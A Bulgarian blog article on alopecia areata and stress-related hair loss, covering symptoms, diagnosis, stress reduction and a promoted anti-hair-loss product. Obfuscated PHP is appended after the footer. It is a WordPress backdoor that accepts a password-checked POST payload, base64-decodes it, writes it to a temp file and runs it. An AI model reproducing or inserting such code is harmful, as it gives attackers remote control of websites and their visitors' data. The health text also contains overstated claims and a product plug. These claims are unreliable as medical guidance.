Алопеция ареата – косопад от стрес | Косопад

Алопеция ареата – косопад от стрес

алопеция ареатаАлопеция ареата е заболяване на имунната система, при което по незнайни засега причини, тялото атакува космените фоликули и така се появява косопад. Тази болест засяга ежегодно милиони души по целия свят, застрашени са както мъжете, така и жените. Експерти предполагат, че последствие от стрес или друго заболяване.

Симптомите на алопеция ареата могат да протекат в три форми. Най – често причинява кръгли, гладки плешиви петна по скалпа, веждите или краката. По рядко се стига до пълна загуба на коса (алопеция тоталис) и окосмение по цялото тяло (алопеция универсалис). Някои пациенти споделят, че преди да се появи, са усещали дразнене или изтръпване в засегнатите зони.

Този вид косопад може да бъде установен по клиничен път, като лабораторните изследвания за кръвна картина са задължителни. Чрез тях се установяват хормоналните нива и концентрацията на желязо, като това може да потвърди или отхвърли наличие на други болести.

Лечението изисква преди всичко намаляване на стреса от ежедневието и осигуряване на спокоен живот. Специалисти препоръчват и използването на препарати против косопад като „Ефект – 2”, който е създаден след серия задълбочени тестове върху хора с подобни признаци.

Причини за стрес и косопад

Възможните предпоставки за стресова ситуация в съвременното общество са безбройни: работа, деца, семейство, хранене, затлъстяване, заболявания, дори и международните военни конфликти. Психолози обясняват, че само новините за големи кръвопролития или природни бедствия в другия край на света удрят пряко върху човешката психика, тъй като подсъзнателно се задейства механизмът за самосъхранение.

Последните изследвания върху стреса разкриват, че той е причинител и ключ към лечението на огромен брой медицински състояния, сред които и косопад. Със сигурност може да се установи дали сте в шоково състояние с помощта на съвременни мозъчни скенери, които регистрират достоверно мозъчната дейност.

Има два начина да се избавите от стрес: посещение в лекарски кабинет или намиране на собствен начин за намаляване на напрежението. При втория случай полезни са общуването с природата, спортът, здравословното хранене, ограничаване консумацията на алкохол и газирани напитки, спиране на тютюнопушенето и др. По отношение на проблема косопад е хубаво, че в 95% от случаите косата възстановява сама, в рамките на няколко месеца след излизане от шоковото състояние.

15. септември 2013 12:57:46 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}